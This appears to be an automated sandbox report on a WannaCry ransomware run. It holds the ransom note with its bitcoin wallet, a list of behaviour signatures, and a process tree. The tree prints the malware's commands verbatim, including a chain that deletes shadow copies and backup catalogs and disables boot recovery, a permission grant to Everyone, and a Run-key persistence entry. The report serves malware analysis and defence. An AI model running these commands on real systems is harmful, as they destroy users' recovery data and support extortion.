Analysis
-
max time kernel
406s -
max time network
600s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
14-10-2024 19:49
General
-
Target
cmd.bat
-
Size
2KB
-
MD5
c63b0bd10a788d38732185b119116f84
-
SHA1
b30038a501aee3db950b972779b230bea5eee589
-
SHA256
784403081f9a839188a4543676894a2d5a9e59ecb9c7038523866c9d054afe9a
-
SHA512
5a599505320830a0c539932b96c65add2f9493dd0e351b9ead48f11bca8acb01c30d9883988f4503dae4e9e36e6e3a1b454f00bb711a44809965b30757cd8048
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\Documents\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 36 IoCs
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks for any installed AV software in registry 1 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 9 IoCs
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 14 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650012⤵
-
-
C:\Windows\system32\timeout.exetimeout /nobreak /t 12⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef84f9758,0x7fef84f9768,0x7fef84f97782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1580 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2224 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1016 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2904 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1436 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3140 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3580 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3772 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2328 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2804 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2324 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2572 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2212 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4168 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2216 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4208 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\python-3.13.0-amd64.exe"C:\Users\Admin\Downloads\python-3.13.0-amd64.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\Temp\{D1FDC4E9-9C46-4A78-8300-1DBA4BC97FC1}\.cr\python-3.13.0-amd64.exe"C:\Windows\Temp\{D1FDC4E9-9C46-4A78-8300-1DBA4BC97FC1}\.cr\python-3.13.0-amd64.exe" -burn.clean.room="C:\Users\Admin\Downloads\python-3.13.0-amd64.exe" -burn.filehandle.attached=180 -burn.filehandle.self=1883⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\AppData\Local\Temp\Python 3.13.0 (64-bit)_20241014195109.log4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4384 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3508 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4340 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2596 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2672 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2952 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1852 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\python-3.13.0-amd64 (2).exe"C:\Users\Admin\Downloads\python-3.13.0-amd64 (2).exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\Temp\{A3D14972-50F2-4130-AA8A-1A38A59C151D}\.cr\python-3.13.0-amd64 (2).exe"C:\Windows\Temp\{A3D14972-50F2-4130-AA8A-1A38A59C151D}\.cr\python-3.13.0-amd64 (2).exe" -burn.clean.room="C:\Users\Admin\Downloads\python-3.13.0-amd64 (2).exe" -burn.filehandle.attached=180 -burn.filehandle.self=1883⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=1352 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=2596 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4384 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4428 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=4500 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=2388 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4188 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=1360,i,16655819823237416114,1168929088312643908,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5041⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Drops startup file
- Loads dropped DLL
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.execmd /c 251541728935588.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @[email protected] vs2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xzylnmtyo879" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xzylnmtyo879" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
-
-
